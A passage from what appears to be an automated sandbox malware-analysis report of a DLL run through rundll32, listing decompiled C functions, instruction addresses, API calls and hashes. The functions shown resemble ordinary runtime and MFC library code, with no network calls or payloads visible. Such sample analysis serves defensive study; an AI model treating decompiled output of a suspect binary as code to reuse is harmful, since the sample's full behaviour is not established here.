					_t25 = SendMessageA( *(_t30 + 0x20), 0x20a, _a4 << 0x00000010 | _t24 & 0x0000ffff, _a8);
				}
				return _t25;
			}










                                                                                                        0x10014b6a
                                                                                                        0x10014b76
                                                                                                        0x10014b7d
                                                                                                        0x10014b7f
                                                                                                        0x10014b81
                                                                                                        0x10014b81
                                                                                                        0x10014b88
                                                                                                        0x10014b90
                                                                                                        0x10014b92
                                                                                                        0x10014b94
                                                                                                        0x10014b94
                                                                                                        0x10014b99
                                                                                                        0x10014ba1
                                                                                                        0x10014bab
                                                                                                        0x10014bae
                                                                                                        0x10014bda
                                                                                                        0x10014bdc
                                                                                                        0x10014bed
                                                                                                        0x10014bf7
                                                                                                        0x10014bf7
                                                                                                        0x10014bb0
                                                                                                        0x10014bcd
                                                                                                        0x10014bcd
                                                                                                        0x10014c0a

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSendState$DesktopFocusParentWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 4150626516-0
                                                                                                        • Opcode ID: 5b01bf8b0614625b6dfc4712dda570fc563ac6b4fe4747a355393bb96065c35e
                                                                                                        • Instruction ID: da954c3516a4c67a5c0724ce6e9457ef8f07bb291b94b912e3f58d07756065a0
                                                                                                        • Opcode Fuzzy Hash: 5b01bf8b0614625b6dfc4712dda570fc563ac6b4fe4747a355393bb96065c35e
                                                                                                        • Instruction Fuzzy Hash: 06110D35A01325BBF7509BA58CC5E5A36A8EB047A4F020421FE41EB160EBB0DD4097A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000B92A, Relevance: 9.2, APIs: 6, Instructions: 209stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 44%
                                                                                                        			E1000B92A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t89;
				intOrPtr _t90;
				signed int* _t95;
				intOrPtr* _t96;
				void* _t99;
				void* _t110;
				void* _t113;
				intOrPtr* _t115;
				intOrPtr* _t119;
				int _t124;
				WCHAR* _t125;
				intOrPtr* _t132;
				intOrPtr* _t137;
				void* _t158;
				signed int _t163;
				void* _t165;
				intOrPtr _t169;
				intOrPtr* _t171;
				WCHAR* _t175;
				void* _t177;
				void* _t178;

				_t158 = __edx;
				_push(0x48);
				E1003EEEB(0x100532f9, __ebx, __edi, __esi);
				_t137 =  *((intOrPtr*)(_t177 + 8));
				_t163 = 0;
				 *((intOrPtr*)(_t177 - 0x2c)) =  *((intOrPtr*)(_t177 + 0xc));
				 *(_t177 - 0x50) =  *(_t177 + 0x1c);
				 *(_t177 - 0x28) = 0;
				 *((intOrPtr*)(_t177 - 0x44)) = 0;
				 *((intOrPtr*)(_t177 - 0x40)) = 0;
				 *((intOrPtr*)(_t177 - 0x24)) = 0;
				 *(_t177 - 0x38) = 0;
				_t89 = E1002AC81(__ecx, _t137, 0x10061bc0);
				 *((intOrPtr*)(_t177 - 0x48)) = _t89;
				 *(_t177 - 0x3c) = 0 | _t89 != 0x00000000;
				_t90 = E1002AC81(_t89 != 0, _t137, 0x10061b60);
				_push(_t177 - 0x20);
				 *((intOrPtr*)(_t177 - 0x4c)) = _t90;
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x3c))() != 0) {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t163 = 0;
				}
				_t169 = 1;
				 *((intOrPtr*)( *_t137 + 0x40))(_t137, 1, _t177 - 0x28);
				if( *(_t177 - 0x3c) == _t163) {
					__eflags =  *((intOrPtr*)(_t177 - 0x2c)) - _t163;
					if( *((intOrPtr*)(_t177 - 0x2c)) == _t163) {
						_t113 =  *((intOrPtr*)( *_t137 + 0x20))(_t137, 4, 3, _t177 - 0x44);
						__eflags = _t113;
						if(_t113 == 0) {
							__imp__CreateBindCtx(_t163, _t177 - 0x40);
							_t115 =  *((intOrPtr*)(_t177 - 0x44));
							 *((intOrPtr*)( *_t115 + 0x50))(_t115,  *((intOrPtr*)(_t177 - 0x40)), _t163, _t177 - 0x2c);
							E1002ACA5(_t177 - 0x40);
							goto L14;
						}
					}
				} else {
					_t185 =  *(_t177 - 0x28) - _t163;
					if( *(_t177 - 0x28) != _t163) {
						E1000816B(_t177 - 0x24, E10007F7E());
						 *(_t177 - 4) = _t163;
						E1000B6D4(_t177 - 0x24, 0xf094);
						_t124 = lstrlenW( *(_t177 - 0x28));
						_t28 =  *((intOrPtr*)(_t177 - 0x24)) - 0xc; // 0x0
						_t173 =  *_t28 + _t124 + 1;
						_t125 = E1000ACF7( *((intOrPtr*)(_t177 - 0x24)), _t185,  *_t28 + _t124 + 1, 2);
						_t186 = _t125 - _t163;
						 *(_t177 - 0x3c) = _t125;
						if(_t125 != _t163) {
							 *(_t177 - 0x54) =  *(E1003F256(_t186));
							 *(E1003F256(_t186)) = _t163;
							_t175 =  *(_t177 - 0x3c);
							E1003F1FC(_t175, _t173, _t173 - 1,  *((intOrPtr*)(_t177 - 0x24)),  *(_t177 - 0x28));
							_t178 = _t178 + 0x14;
							_t132 = E1003F256(_t186);
							_t187 =  *_t132 - _t163;
							if( *_t132 == _t163) {
								 *(E1003F256(__eflags)) =  *(_t177 - 0x54);
							} else {
								E1000B122( *((intOrPtr*)(E1003F256(_t187))));
							}
							__imp__CoTaskMemFree( *(_t177 - 0x28));
							 *(_t177 - 0x28) = _t175;
						}
						 *(_t177 - 4) =  *(_t177 - 4) | 0xffffffff;
						E10001280( *((intOrPtr*)(_t177 - 0x24)) + 0xfffffff0, _t158);
						_t169 = 1;
					}
					_t119 =  *((intOrPtr*)(_t177 - 0x48));
					 *((intOrPtr*)( *_t119 + 0x20))(_t119, _t177 - 0x2c);
					L14:
					 *((intOrPtr*)(_t177 - 0x24)) = _t169;
				}
				_t95 =  *(_t177 - 0x50);
				if(_t95 == _t163) {
					_t96 =  *((intOrPtr*)(_t177 - 0x4c));
					__eflags = _t96 - _t163;
					if(_t96 == _t163) {
						L19:
						 *(_t177 - 0x34) = _t163;
						 *(_t177 - 0x30) = _t163;
					} else {
						_t110 =  *((intOrPtr*)( *_t96 + 0x24))(_t96,  *((intOrPtr*)(_t177 + 0x10)), 0xffffffff, _t163, _t177 - 0x34);
						__eflags = _t110;
						if(_t110 != 0) {
							goto L19;
						}
					}
				} else {
					 *(_t177 - 0x34) =  *_t95;
					 *(_t177 - 0x30) = _t95[1];
				}
				_push(_t177 - 0x38);
				_push( *((intOrPtr*)(_t177 + 0x10)));
				_push(_t137);
				if( *((intOrPtr*)( *_t137 + 0x58))() != 0) {
					 *(_t177 - 0x38) = _t163;
				}
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t99 = E1000AEEB();
				_t171 = __imp__CoTaskMemFree;
				_t165 = _t99;
				 *_t171( *(_t177 - 0x28),  *((intOrPtr*)(_t177 + 0x10)),  *(_t177 - 0x34),  *(_t177 - 0x30),  *((intOrPtr*)(_t177 + 0x14)),  *((intOrPtr*)(_t177 + 0x18)),  *(_t177 - 0x38),  *(_t177 - 0x28),  *((intOrPtr*)(_t177 - 0x2c)));
				if( *((intOrPtr*)(_t177 - 0x24)) != 0) {
					 *_t171( *((intOrPtr*)(_t177 - 0x2c)));
				}
				E1002ACA5(_t177 - 0x44);
				E1002ACA5(_t177 - 0x48);
				E1002ACA5(_t177 - 0x4c);
				return E1003EF35(_t137, _t165, _t171);
			}
























                                                                                                        0x1000b92a
                                                                                                        0x1000b92a
                                                                                                        0x1000b931
                                                                                                        0x1000b939
                                                                                                        0x1000b93c
                                                                                                        0x1000b93e
                                                                                                        0x1000b94a
                                                                                                        0x1000b94d
                                                                                                        0x1000b950
                                                                                                        0x1000b953
                                                                                                        0x1000b956
                                                                                                        0x1000b959
                                                                                                        0x1000b95c
                                                                                                        0x1000b96e
                                                                                                        0x1000b971
                                                                                                        0x1000b974
                                                                                                        0x1000b97c
                                                                                                        0x1000b97d
                                                                                                        0x1000b982
                                                                                                        0x1000b988
                                                                                                        0x1000b992
                                                                                                        0x1000b993
                                                                                                        0x1000b994
                                                                                                        0x1000b995
                                                                                                        0x1000b996
                                                                                                        0x1000b996
                                                                                                        0x1000b9a0
                                                                                                        0x1000b9a3
                                                                                                        0x1000b9a9
                                                                                                        0x1000ba71
                                                                                                        0x1000ba74
                                                                                                        0x1000ba81
                                                                                                        0x1000ba84
                                                                                                        0x1000ba86
                                                                                                        0x1000ba8d
                                                                                                        0x1000ba93
                                                                                                        0x1000baa1
                                                                                                        0x1000baa8
                                                                                                        0x00000000
                                                                                                        0x1000baa8
                                                                                                        0x1000ba86
                                                                                                        0x1000b9af
                                                                                                        0x1000b9af
                                                                                                        0x1000b9b2
                                                                                                        0x1000b9c1
                                                                                                        0x1000b9ce
                                                                                                        0x1000b9d1
                                                                                                        0x1000b9d9
                                                                                                        0x1000b9e2
                                                                                                        0x1000b9e5
                                                                                                        0x1000b9ec
                                                                                                        0x1000b9f1
                                                                                                        0x1000b9f5
                                                                                                        0x1000b9f8
                                                                                                        0x1000ba01
                                                                                                        0x1000ba09
                                                                                                        0x1000ba16
                                                                                                        0x1000ba1a
                                                                                                        0x1000ba1f
                                                                                                        0x1000ba22
                                                                                                        0x1000ba27
                                                                                                        0x1000ba29
                                                                                                        0x1000ba42
                                                                                                        0x1000ba2b
                                                                                                        0x1000ba32
                                                                                                        0x1000ba37
                                                                                                        0x1000ba47
                                                                                                        0x1000ba4d
                                                                                                        0x1000ba4d
                                                                                                        0x1000ba53
                                                                                                        0x1000ba5a
                                                                                                        0x1000ba61
                                                                                                        0x1000ba61
                                                                                                        0x1000ba62
                                                                                                        0x1000ba6c
                                                                                                        0x1000baad
                                                                                                        0x1000baad
                                                                                                        0x1000baad
                                                                                                        0x1000bab0
                                                                                                        0x1000bab5
                                                                                                        0x1000bac4
                                                                                                        0x1000bac7
                                                                                                        0x1000bac9
                                                                                                        0x1000badf
                                                                                                        0x1000badf
                                                                                                        0x1000bae2
                                                                                                        0x1000bacb
                                                                                                        0x1000bad8
                                                                                                        0x1000badb
                                                                                                        0x1000badd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000badd
                                                                                                        0x1000bab7
                                                                                                        0x1000babc
                                                                                                        0x1000babf
                                                                                                        0x1000babf
                                                                                                        0x1000baea
                                                                                                        0x1000baeb
                                                                                                        0x1000baee
                                                                                                        0x1000baf4
                                                                                                        0x1000baf6
                                                                                                        0x1000baf6
                                                                                                        0x1000bb19
                                                                                                        0x1000bb1a
                                                                                                        0x1000bb1b
                                                                                                        0x1000bb1c
                                                                                                        0x1000bb1d
                                                                                                        0x1000bb25
                                                                                                        0x1000bb2b
                                                                                                        0x1000bb2d
                                                                                                        0x1000bb33
                                                                                                        0x1000bb38
                                                                                                        0x1000bb38
                                                                                                        0x1000bb3e
                                                                                                        0x1000bb47
                                                                                                        0x1000bb50
                                                                                                        0x1000bb5c

                                                                                                        APIs
                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 1000B931
                                                                                                        • lstrlenW.KERNEL32(?,0000F094,00000000,?,10061BE0), ref: 1000B9D9
                                                                                                        • CoTaskMemFree.OLE32(?,?,10061BE0), ref: 1000BA47
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        • CreateBindCtx.OLE32(00000000,?), ref: 1000BA8D
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 1000BB2D
                                                                                                        • CoTaskMemFree.OLE32(?), ref: 1000BB38
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeTask$BindCreateH_prolog3___getptd_noexitlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 473291332-0
                                                                                                        • Opcode ID: e3cca7ad2acf628dbfc3ad23d0df768f674a2aec5e6a7a00b090678edb58c946
                                                                                                        • Instruction ID: feeb13e85b8e5de12b5c474336f826b4b97c54b0b778c90d16d1a77109a03906
                                                                                                        • Opcode Fuzzy Hash: e3cca7ad2acf628dbfc3ad23d0df768f674a2aec5e6a7a00b090678edb58c946
                                                                                                        • Instruction Fuzzy Hash: 6E713275D00619EFDF01DFA4C8858EEBBBAFF8A350B244149F501BB265DB31AA41CB21
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10026ADC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E10026ADC(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t26 = __ebx;
				_t9 =  *0x10072650; // 0xb5e27fef
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					E10001000(__ebx, __edi, _t35, E1003FCB4(__edx,  &_v288, 4, "LOC"));
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E1003F256(_t39));
					 *(E1003F256(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E1003F3EF( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E1003F256(_t39);
					_t40 =  *_t18;
					if( *_t18 == 0) {
						 *(E1003F256(__eflags)) = _t34;
					} else {
						E1000B122( *((intOrPtr*)(E1003F256(_t40))));
					}
					if(_t27 == 0xffffffff || _t27 >= _t35) {
						_t12 = 0;
						__eflags = 0;
					} else {
						_t12 = LoadLibraryA( &_v284);
					}
					_pop(_t33);
					_pop(_t26);
				}
				return E10039F21(_t12, _t26, _v8 ^ _t36, _t32, _t33, _t35);
			}

















                                                                                                        0x10026adc
                                                                                                        0x10026adc
                                                                                                        0x10026adc
                                                                                                        0x10026ae5
                                                                                                        0x10026aec
                                                                                                        0x10026aef
                                                                                                        0x10026af7
                                                                                                        0x10026aff
                                                                                                        0x10026b73
                                                                                                        0x10026b75
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10026b77
                                                                                                        0x10026b01
                                                                                                        0x10026b0f
                                                                                                        0x10026b14
                                                                                                        0x10026b17
                                                                                                        0x10026b17
                                                                                                        0x10026b18
                                                                                                        0x10026b1e
                                                                                                        0x10026b25
                                                                                                        0x10026b35
                                                                                                        0x10026b4a
                                                                                                        0x10026b4c
                                                                                                        0x10026b51
                                                                                                        0x10026b54
                                                                                                        0x10026b7e
                                                                                                        0x10026b56
                                                                                                        0x10026b5d
                                                                                                        0x10026b62
                                                                                                        0x10026b83
                                                                                                        0x10026b98
                                                                                                        0x10026b98
                                                                                                        0x10026b89
                                                                                                        0x10026b90
                                                                                                        0x10026b90
                                                                                                        0x10026b9a
                                                                                                        0x10026b9b
                                                                                                        0x10026b9b
                                                                                                        0x10026ba8

                                                                                                        APIs
                                                                                                        • _strcpy_s.LIBCMT ref: 10026B09
                                                                                                          • Part of subcall function 1003F256: __getptd_noexit.LIBCMT ref: 1003F256
                                                                                                        • __snprintf_s.LIBCMT ref: 10026B42
                                                                                                          • Part of subcall function 1003F3EF: __vsnprintf_s_l.LIBCMT ref: 1003F404
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10026B6D
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 10026B90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                        • String ID: LOC
                                                                                                        • API String ID: 3864805678-519433814
                                                                                                        • Opcode ID: 41e70f5e17d831a35654395bcd47d3dc8ca47c00ca9706084b8a50ae0e7bbd08
                                                                                                        • Instruction ID: 2309c2de20968928c53affd92b9fb6a1ba26f59a6acc7024cc465e5c4a1caa6c
                                                                                                        • Opcode Fuzzy Hash: 41e70f5e17d831a35654395bcd47d3dc8ca47c00ca9706084b8a50ae0e7bbd08
                                                                                                        • Instruction Fuzzy Hash: 2E11E975900218AFDB13EB60DC46BEE77ACDF0A351F4004A5F648EB091DB74AE858A95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10039F21, Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E10039F21(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x10072650; // 0xb5e27fef
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10099390 = _t6;
				 *0x1009938c = _t22;
				 *0x10099388 = _t25;
				 *0x10099384 = _t21;
				 *0x10099380 = _t27;
				 *0x1009937c = _t26;
				 *0x100993a8 = ss;
				 *0x1009939c = cs;
				 *0x10099378 = ds;
				 *0x10099374 = es;
				 *0x10099370 = fs;
				 *0x1009936c = gs;
				asm("pushfd");
				_pop( *0x100993a0);
				 *0x10099394 =  *_t31;
				 *0x10099398 = _v0;
				 *0x100993a4 =  &_a4;
				 *0x100992e0 = 0x10001;
				_t11 =  *0x10099398; // 0x0
				 *0x10099294 = _t11;
				 *0x10099288 = 0xc0000409;
				 *0x1009928c = 1;
				_t12 =  *0x10072650; // 0xb5e27fef
				_v812 = _t12;
				_t13 =  *0x10072654; // 0x4a1d8010
				_v808 = _t13;
				 *0x100992d8 = IsDebuggerPresent();
				_push(1);
				E1004B88D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1005fbcc);
				if( *0x100992d8 == 0) {
					_push(1);
					E1004B88D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f21
                                                                                                        0x10039f27
                                                                                                        0x10039f29
                                                                                                        0x10039f29
                                                                                                        0x10040582
                                                                                                        0x10040587
                                                                                                        0x1004058d
                                                                                                        0x10040593
                                                                                                        0x10040599
                                                                                                        0x1004059f
                                                                                                        0x100405a5
                                                                                                        0x100405ac
                                                                                                        0x100405b3
                                                                                                        0x100405ba
                                                                                                        0x100405c1
                                                                                                        0x100405c8
                                                                                                        0x100405cf
                                                                                                        0x100405d0
                                                                                                        0x100405d9
                                                                                                        0x100405e1
                                                                                                        0x100405e9
                                                                                                        0x100405f4
                                                                                                        0x100405fe
                                                                                                        0x10040603
                                                                                                        0x10040608
                                                                                                        0x10040612
                                                                                                        0x1004061c
                                                                                                        0x10040621
                                                                                                        0x10040627
                                                                                                        0x1004062c
                                                                                                        0x10040638
                                                                                                        0x1004063d
                                                                                                        0x1004063f
                                                                                                        0x10040647
                                                                                                        0x10040652
                                                                                                        0x1004065f
                                                                                                        0x10040661
                                                                                                        0x10040663
                                                                                                        0x10040668
                                                                                                        0x1004067c

                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 10040632
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10040647
                                                                                                        • UnhandledExceptionFilter.KERNEL32(1005FBCC), ref: 10040652
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 1004066E
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 10040675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: 63f44c50f42e153a5708249d6d5a307e39c46eb98c64dd299f3aed359b190d5e
                                                                                                        • Instruction ID: 0f708c82d41b9f52fd32eb2f2d19f5a72d3e9f2e2ae1f9816dd2f8878cb93bd3
                                                                                                        • Opcode Fuzzy Hash: 63f44c50f42e153a5708249d6d5a307e39c46eb98c64dd299f3aed359b190d5e
                                                                                                        • Instruction Fuzzy Hash: 5E2180B4401226EFF748DF69CDC96843BA4FB48701F50811BF90D972A0E7B55A85CF45
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002592C, Relevance: 4.6, APIs: 3, Instructions: 125stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 85%
                                                                                                        			E1002592C(intOrPtr __ebx, signed int __edx) {
				void* __edi;
				void* __esi;
				signed int _t46;
				intOrPtr _t49;
				signed int _t51;
				void* _t53;
				signed int* _t76;
				signed int* _t79;
				signed int* _t82;
				signed int* _t85;
				signed int _t96;
				CHAR* _t98;
				intOrPtr _t99;
				signed int* _t102;
				intOrPtr _t103;
				signed int _t104;
				void* _t106;

				_t96 = __edx;
				_t84 = __ebx;
				_t104 = _t106 - 0xcc;
				_t46 =  *0x10072650; // 0xb5e27fef
				 *(_t104 + 0xc8) = _t46 ^ _t104;
				_t102 =  *(_t104 + 0xd8);
				_t98 =  *(_t104 + 0xd4);
				if(_t98 != 0) {
					if(lstrlenA(_t98) >= 0x104) {
						goto L1;
					} else {
						_push(__ebx);
						_t85 =  &(_t102[8]);
						_t51 = E1002F560(_t85, _t98);
						if(_t51 != 0) {
							_t53 = FindFirstFileA(_t98, _t104 - 0x78);
							_t100 = _t98 | 0xffffffff;
							if(_t53 != (_t98 | 0xffffffff)) {
								FindClose(_t53);
								_t102[8] =  *(_t104 - 0x78) & 0x0000007f;
								asm("cdq");
								_t102[6] =  *(_t104 - 0x58);
								_t102[7] = _t96;
								if(E100256CA(_t104 - 0x74) == 0) {
									 *_t102 =  *_t102 & 0x00000000;
									_t102[1] = _t102[1] & 0x00000000;
								} else {
									_t82 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x74, _t100);
									 *_t102 =  *_t82;
									_t102[1] = _t82[1];
								}
								if(E100256CA(_t104 - 0x6c) == 0) {
									_t102[4] = 0;
									_t102[5] = 0;
								} else {
									_t79 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x6c, _t100);
									_t102[4] =  *_t79;
									_t102[5] = _t79[1];
								}
								if(E100256CA(_t104 - 0x64) == 0) {
									_t102[2] = 0;
									_t102[3] = 0;
								} else {
									_t76 = E100257E4(_t85, _t104 - 0x80, _t100, _t104 - 0x64, _t100);
									_t102[2] =  *_t76;
									_t102[3] = _t76[1];
								}
								if(( *_t102 | _t102[1]) == 0) {
									 *_t102 = _t102[2];
									_t102[1] = _t102[3];
								}
								if((_t102[4] | _t102[5]) == 0) {
									_t102[4] = _t102[2];
									_t102[5] = _t102[3];
								}
								_t49 = 1;
							} else {
								goto L6;
							}
						} else {
							 *_t85 = _t51;
							L6:
							_t49 = 0;
						}
						_pop(_t84);
					}
				} else {
					L1:
					_t49 = 0;
				}
				_pop(_t99);
				_pop(_t103);
				return E10039F21(_t49, _t84,  *(_t104 + 0xc8) ^ _t104, _t96, _t99, _t103);
			}




















                                                                                                        0x1002592c
                                                                                                        0x1002592c
                                                                                                        0x1002592d
                                                                                                        0x1002593a
                                                                                                        0x10025941
                                                                                                        0x10025948
                                                                                                        0x1002594f
                                                                                                        0x10025957
                                                                                                        0x1002596c
                                                                                                        0x00000000
                                                                                                        0x1002596e
                                                                                                        0x1002596e
                                                                                                        0x10025970
                                                                                                        0x10025974
                                                                                                        0x1002597b
                                                                                                        0x10025986
                                                                                                        0x1002598c
                                                                                                        0x10025991
                                                                                                        0x1002599b
                                                                                                        0x100259a6
                                                                                                        0x100259ac
                                                                                                        0x100259ad
                                                                                                        0x100259b4
                                                                                                        0x100259be
                                                                                                        0x100259d9
                                                                                                        0x100259dc
                                                                                                        0x100259c0
                                                                                                        0x100259c8
                                                                                                        0x100259cf
                                                                                                        0x100259d4
                                                                                                        0x100259d4
                                                                                                        0x100259eb
                                                                                                        0x10025a0b
                                                                                                        0x10025a0e
                                                                                                        0x100259ed
                                                                                                        0x100259f5
                                                                                                        0x100259fc
                                                                                                        0x10025a02
                                                                                                        0x10025a02
                                                                                                        0x10025a1c
                                                                                                        0x10025a3c
                                                                                                        0x10025a3f
                                                                                                        0x10025a1e
                                                                                                        0x10025a26
                                                                                                        0x10025a2d
                                                                                                        0x10025a33
                                                                                                        0x10025a33
                                                                                                        0x10025a47
                                                                                                        0x10025a4c
                                                                                                        0x10025a51
                                                                                                        0x10025a51
                                                                                                        0x10025a5a
                                                                                                        0x10025a5f
                                                                                                        0x10025a65
                                                                                                        0x10025a65
                                                                                                        0x10025a6a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002597d
                                                                                                        0x1002597d
                                                                                                        0x10025993
                                                                                                        0x10025993
                                                                                                        0x10025993
                                                                                                        0x10025a6b
                                                                                                        0x10025a6b
                                                                                                        0x10025959
                                                                                                        0x10025959
                                                                                                        0x10025959
                                                                                                        0x10025959
                                                                                                        0x10025a72
                                                                                                        0x10025a75
                                                                                                        0x10025a82

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,-00000001), ref: 10025961
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
